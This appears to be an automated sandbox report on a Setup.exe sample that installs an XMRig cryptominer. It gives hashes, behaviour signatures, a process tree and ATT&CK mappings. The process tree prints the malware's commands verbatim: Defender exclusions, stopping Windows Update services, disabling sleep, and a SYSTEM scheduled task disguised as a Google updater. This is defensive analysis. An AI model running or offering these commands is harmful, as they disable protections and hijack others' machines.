Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
11-07-2024 12:37
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v2004-20240709-en
General
-
Target
Setup.exe
-
Size
5.6MB
-
MD5
fe3aade85026dd848fdf2f63952ff734
-
SHA1
09d5fd71d993050b588cc79544a6bf243d6f8ab4
-
SHA256
8345803c6780d770d0ea3df50d6c06d6b1113e7316b3d93dbea7e54a9fdcd58c
-
SHA512
db089fde7d6806fa929e0ec2c48bfcb84c7e47d01ddf45380d3681d988947222d938e0d15a9cb3d69975262fcc1508582f58b4cf22dd891cfaf3f45e6afc0bb8
-
SSDEEP
98304:ld+0JWUJGRDGQ8kIsmAYrvllcL0QH3YRjdT3i14b60n70p7hr/Bazr3AT:lQRV2lkeBxV7E7hr/BUTA
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 2696 created 1220 2696 Setup.exe 21 PID 2696 created 1220 2696 Setup.exe 21 PID 2696 created 1220 2696 Setup.exe 21 PID 2696 created 1220 2696 Setup.exe 21 PID 2696 created 1220 2696 Setup.exe 21 PID 1068 created 1220 1068 updater.exe 21 PID 1068 created 1220 1068 updater.exe 21 PID 1068 created 1220 1068 updater.exe 21 PID 1068 created 1220 1068 updater.exe 21 PID 1068 created 1220 1068 updater.exe 21 PID 1068 created 1220 1068 updater.exe 21 -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/1068-35-0x000000013F820000-0x000000013FDBF000-memory.dmp xmrig behavioral1/memory/2188-38-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-40-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-42-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-44-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-46-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-48-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-50-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-52-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-54-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-56-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2188-58-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2708 powershell.exe 2800 powershell.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts Setup.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Executes dropped EXE 1 IoCs
pid Process 1068 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2284 taskeng.exe -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 784 powercfg.exe 1296 powercfg.exe 2276 cmd.exe 2456 powercfg.exe 2320 powercfg.exe 1036 powercfg.exe 1940 powercfg.exe 1972 powercfg.exe 3000 powercfg.exe 2624 cmd.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1068 set thread context of 1720 1068 updater.exe 71 PID 1068 set thread context of 2188 1068 updater.exe 72 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe Setup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1412 sc.exe 2720 sc.exe 2548 sc.exe 2572 sc.exe 1936 sc.exe 1512 sc.exe 2448 sc.exe 2252 sc.exe 2600 sc.exe 2860 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1039211f8fd3da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1624 schtasks.exe 3012 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2696 Setup.exe 2696 Setup.exe 2708 powershell.exe 2696 Setup.exe 2696 Setup.exe 2696 Setup.exe 2696 Setup.exe 2696 Setup.exe 2696 Setup.exe 2484 powershell.exe 2696 Setup.exe 2696 Setup.exe 1068 updater.exe 1068 updater.exe 2800 powershell.exe 1068 updater.exe 1068 updater.exe 1068 updater.exe 1068 updater.exe 1068 updater.exe 1068 updater.exe 2096 powershell.exe 1068 updater.exe 1068 updater.exe 1068 updater.exe 1068 updater.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe 2188 explorer.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 2708 powershell.exe Token: SeShutdownPrivilege 2320 powercfg.exe Token: SeShutdownPrivilege 784 powercfg.exe Token: SeShutdownPrivilege 1036 powercfg.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeShutdownPrivilege 1296 powercfg.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeShutdownPrivilege 1940 powercfg.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeShutdownPrivilege 1972 powercfg.exe Token: SeShutdownPrivilege 2456 powercfg.exe Token: SeShutdownPrivilege 3000 powercfg.exe Token: SeDebugPrivilege 1068 updater.exe Token: SeLockMemoryPrivilege 2188 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2836 wrote to memory of 2720 2836 cmd.exe 34 PID 2836 wrote to memory of 2720 2836 cmd.exe 34 PID 2836 wrote to memory of 2720 2836 cmd.exe 34 PID 2836 wrote to memory of 2600 2836 cmd.exe 35 PID 2836 wrote to memory of 2600 2836 cmd.exe 35 PID 2836 wrote to memory of 2600 2836 cmd.exe 35 PID 2836 wrote to memory of 2860 2836 cmd.exe 36 PID 2836 wrote to memory of 2860 2836 cmd.exe 36 PID 2836 wrote to memory of 2860 2836 cmd.exe 36 PID 2836 wrote to memory of 2548 2836 cmd.exe 37 PID 2836 wrote to memory of 2548 2836 cmd.exe 37 PID 2836 wrote to memory of 2548 2836 cmd.exe 37 PID 2836 wrote to memory of 2572 2836 cmd.exe 38 PID 2836 wrote to memory of 2572 2836 cmd.exe 38 PID 2836 wrote to memory of 2572 2836 cmd.exe 38 PID 2624 wrote to memory of 2320 2624 cmd.exe 43 PID 2624 wrote to memory of 2320 2624 cmd.exe 43 PID 2624 wrote to memory of 2320 2624 cmd.exe 43 PID 2624 wrote to memory of 784 2624 cmd.exe 44 PID 2624 wrote to memory of 784 2624 cmd.exe 44 PID 2624 wrote to memory of 784 2624 cmd.exe 44 PID 2624 wrote to memory of 1036 2624 cmd.exe 45 PID 2624 wrote to memory of 1036 2624 cmd.exe 45 PID 2624 wrote to memory of 1036 2624 cmd.exe 45 PID 2624 wrote to memory of 1296 2624 cmd.exe 46 PID 2624 wrote to memory of 1296 2624 cmd.exe 46 PID 2624 wrote to memory of 1296 2624 cmd.exe 46 PID 2484 wrote to memory of 1624 2484 powershell.exe 47 PID 2484 wrote to memory of 1624 2484 powershell.exe 47 PID 2484 wrote to memory of 1624 2484 powershell.exe 47 PID 2284 wrote to memory of 1068 2284 taskeng.exe 51 PID 2284 wrote to memory of 1068 2284 taskeng.exe 51 PID 2284 wrote to memory of 1068 2284 taskeng.exe 51 PID 1432 wrote to memory of 1936 1432 cmd.exe 57 PID 1432 wrote to memory of 1936 1432 cmd.exe 57 PID 1432 wrote to memory of 1936 1432 cmd.exe 57 PID 1432 wrote to memory of 1512 1432 cmd.exe 58 PID 1432 wrote to memory of 1512 1432 cmd.exe 58 PID 1432 wrote to memory of 1512 1432 cmd.exe 58 PID 1432 wrote to memory of 1412 1432 cmd.exe 59 PID 1432 wrote to memory of 1412 1432 cmd.exe 59 PID 1432 wrote to memory of 1412 1432 cmd.exe 59 PID 1432 wrote to memory of 2448 1432 cmd.exe 60 PID 1432 wrote to memory of 2448 1432 cmd.exe 60 PID 1432 wrote to memory of 2448 1432 cmd.exe 60 PID 1432 wrote to memory of 2252 1432 cmd.exe 61 PID 1432 wrote to memory of 2252 1432 cmd.exe 61 PID 1432 wrote to memory of 2252 1432 cmd.exe 61 PID 2276 wrote to memory of 1940 2276 cmd.exe 66 PID 2276 wrote to memory of 1940 2276 cmd.exe 66 PID 2276 wrote to memory of 1940 2276 cmd.exe 66 PID 2276 wrote to memory of 1972 2276 cmd.exe 67 PID 2276 wrote to memory of 1972 2276 cmd.exe 67 PID 2276 wrote to memory of 1972 2276 cmd.exe 67 PID 2276 wrote to memory of 2456 2276 cmd.exe 68 PID 2276 wrote to memory of 2456 2276 cmd.exe 68 PID 2276 wrote to memory of 2456 2276 cmd.exe 68 PID 2276 wrote to memory of 3000 2276 cmd.exe 69 PID 2276 wrote to memory of 3000 2276 cmd.exe 69 PID 2276 wrote to memory of 3000 2276 cmd.exe 69 PID 2096 wrote to memory of 3012 2096 powershell.exe 70 PID 2096 wrote to memory of 3012 2096 powershell.exe 70 PID 2096 wrote to memory of 3012 2096 powershell.exe 70 PID 1068 wrote to memory of 1720 1068 updater.exe 71 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2600
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2860
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2548
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2572
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbjsmh#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1624
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1936
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1512
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1412
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2252
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbjsmh#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3012
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1720
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {092633AD-CB8E-4772-83DE-5F5E7464E04E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1068
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
1Windows Service
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c644ad8a2d89e73121b73d85450ed40f
SHA109b95e691390c053cd0b59a1be802d40d830203c
SHA25689d1d194cd074d51cb323672873d451fc44723962234edf1d0ffa8bc2b7ba0c6
SHA512711df1e51744c5cce81532295b79b398152bfbbcb9ca4cb8753af4efa7efe0dd0e2dcf8ab8d4055a05aaf9ae2e931fbdce91ee19298bb9bf18103ada6516a6d7
-
Filesize
2KB
MD52b19df2da3af86adf584efbddd0d31c0
SHA1f1738910789e169213611c033d83bc9577373686
SHA25658868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA5124a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6
-
Filesize
5.6MB
MD5fe3aade85026dd848fdf2f63952ff734
SHA109d5fd71d993050b588cc79544a6bf243d6f8ab4
SHA2568345803c6780d770d0ea3df50d6c06d6b1113e7316b3d93dbea7e54a9fdcd58c
SHA512db089fde7d6806fa929e0ec2c48bfcb84c7e47d01ddf45380d3681d988947222d938e0d15a9cb3d69975262fcc1508582f58b4cf22dd891cfaf3f45e6afc0bb8